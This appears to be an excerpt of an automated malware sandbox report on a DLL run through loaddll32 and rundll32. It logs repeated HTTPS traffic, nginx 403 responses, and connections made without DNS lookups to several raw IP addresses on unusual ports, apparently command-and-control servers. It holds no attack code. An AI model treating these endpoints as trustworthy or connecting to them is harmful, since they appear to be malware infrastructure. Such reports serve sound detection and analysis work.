                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:54:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:55:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:56:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000007.00000003.430153868.0000000003361000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: rundll32.exe, 00000007.00000003.430153868.0000000003361000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Gq
                      Source: rundll32.exe, 00000007.00000002.815150304.00000000032FA000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000007.00000003.430285368.000000000541D000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815150304.00000000032FA000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?561c40c84f427
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabv
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: rundll32.exe, 00000007.00000003.421191267.000000000336A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/Ev
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: rundll32.exe, 00000007.00000003.685102476.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/la
                      Source: rundll32.exe, 00000007.00000002.815270694.0000000003361000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/Gq
                      Source: loaddll32.exe, 00000002.00000003.474152776.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.524322961.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: rundll32.exe, 00000007.00000002.815270694.0000000003361000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/P
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/W
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.496322195.0000000003361000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.421191267.000000000336A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: rundll32.exe, 00000007.00000003.590697653.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hyQq
                      Source: rundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hybq
                      Source: loaddll32.exe, 00000002.00000003.789280519.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lGq
                      Source: rundll32.exe, 00000007.00000003.624273197.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/la
                      Source: rundll32.exe, 00000007.00000003.524322961.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: rundll32.exe, 00000007.00000003.565788704.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/llbq
                      Source: loaddll32.exe, 00000002.00000003.590990072.0000000000F5F000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.789346545.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000002.00000003.507704635.0000000000F59000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/z
                      Source: loaddll32.exe, 00000002.00000002.813943136.0000000000F4C000.00000004.00000020.sdmpString found in binary or memory: https://182.46.210.220/
                      Source: rundll32.exe, 00000007.00000002.815270694.0000000003361000.00000004.00000020.sdmpString found in binary or memory: https://183.244.140.214:808/
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/-
                      Source: loaddll32.exe, 00000002.00000003.438385750.0000000000F5A000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/T
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/rm
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000002.00000003.780894009.0000000000F4C000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4802
                      Source: rundll32.exe, 00000007.00000003.693220636.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4H
